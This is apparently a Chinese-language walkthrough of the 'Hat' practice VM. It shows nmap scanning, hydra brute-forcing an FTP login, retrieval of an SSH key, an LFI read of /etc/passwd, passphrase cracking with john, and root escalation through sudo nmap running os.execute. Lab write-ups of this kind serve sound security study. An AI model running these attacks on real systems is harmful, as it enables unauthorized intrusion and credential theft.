# 靶场搭建
下载:Hat
Nat,IP: 192.168.1.171
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp filtered ssh | |
80/tcp open http Apache httpd 2.4.38 ((Debian)) | |
|_http-server-header: Apache/2.4.38 (Debian) | |
|_http-title: Apache2 Debian Default Page: It works | |
65535/tcp open ftp pyftpdlib 1.5.4 | |
| ftp-syst: | |
| STAT: | |
| FTP server status: | |
| Connected to: 192.168.1.171:65535 | |
| Waiting for username. | |
| TYPE: ASCII; STRUcture: File; MODE: Stream | |
| Data connection closed. | |
|_End of status. |
目录扫描结果 http://192.168.1.171/logs/vsftpd.log
发现账号 admin_log
,爆破
┌──(root㉿kali)-[~] | |
└─# hydra -l admin_ftp -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.171:65535 -I -t 64 | |
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). | |
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 09:31:08 | |
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task | |
[DATA] attacking ftp://192.168.1.171:65535/ | |
[65535][ftp] host: 192.168.1.171 login: admin_ftp password: cowboy | |
1 of 1 target successfully completed, 1 valid password found | |
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 09:32:08 |
得到密码: cowboy
┌──(root㉿kali)-[~] | |
└─# ftp 192.168.1.171 -p 65535 | |
Connected to 192.168.1.171. | |
220 pyftpdlib 1.5.4 ready. | |
Name (192.168.1.171:root): admin_ftp | |
331 Username ok, send password. | |
Password: | |
230 Login successful. | |
Remote system type is UNIX. | |
Using binary mode to transfer files. | |
ftp> ls -al | |
229 Entering extended passive mode (|||39311|). | |
125 Data connection already open. Transfer starting. | |
drwxrwxrwx 2 cromiphi cromiphi 4096 Sep 28 2021 share | |
226 Transfer complete. | |
ftp> cd share | |
250 "/share" is the current directory. | |
ftp> ls -al | |
229 Entering extended passive mode (|||35733|). | |
125 Data connection already open. Transfer starting. | |
-rwxrwxrwx 1 cromiphi cromiphi 1751 Sep 28 2021 id_rsa | |
-rwxrwxrwx 1 cromiphi cromiphi 108 Sep 28 2021 note | |
226 Transfer complete. | |
ftp> get id_rsa | |
local: id_rsa remote: id_rsa | |
229 Entering extended passive mode (|||54749|). | |
125 Data connection already open. Transfer starting. | |
100% |**********************************************************| 1751 1.34 MiB/s 00:00 ETA | |
226 Transfer complete. | |
1751 bytes received in 00:00 (927.81 KiB/s) | |
ftp> get note | |
local: note remote: note | |
229 Entering extended passive mode (|||33729|). | |
125 Data connection already open. Transfer starting. | |
100% |**********************************************************| 108 10.21 KiB/s 00:00 ETA | |
226 Transfer complete. | |
108 bytes received in 00:00 (9.06 KiB/s) |
拿到 id_rsa
但是不知道用户是哪个,继续扫目录和参数
结果拿到 LFI: http://192.168.1.171/php-scripts/file.php?6=/etc/passwd
找到用户: cromiphi
┌──(root㉿kali)-[~] | |
└─# ssh2john id_rsa > id_rsa.hash | |
┌──(root㉿kali)-[~] | |
└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt | |
Using default input encoding: UTF-8 | |
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) | |
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes | |
Cost 2 (iteration count) is 2 for all loaded hashes | |
Will run 4 OpenMP threads | |
Press 'q' or Ctrl-C to abort, almost any other key for status | |
ilovemyself (id_rsa) | |
1g 0:00:00:00 DONE (2024-06-01 09:38) 100.0g/s 160000p/s 160000c/s 160000C/s joyce..dragon1 | |
Use the "--show" option to display all of the cracked passwords reliably | |
Session completed. | |
┌──(root㉿kali)-[~] | |
└─# ssh -6 -i id_rsa cromiphi@fe80::20c:29ff:feeb:aa7f%eth0 | |
Enter passphrase for key 'id_rsa': | |
Linux hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 | |
cromiphi@hat:~$ id | |
uid=1000(cromiphi) gid=1000(cromiphi) grupos=1000(cromiphi) |
拿到了 shell
# 提权
cromiphi@hat:~$ TF=$(mktemp) | |
cromiphi@hat:~$ echo 'os.execute("/bin/sh")' > $TF | |
cromiphi@hat:~$ sudo nmap --script=$TF | |
Starting Nmap 7.70 ( https://nmap.org ) at 2024-06-01 23:40 CEST | |
NSE: Warning: Loading '/tmp/tmp.K4zF4OqmnC' -- the recommended file extension is '.nse'. | |
# 8b4acc39c4d068623a16a89ebecd5048 |
输入没有回显,可以直接复制进去反弹 shell 出来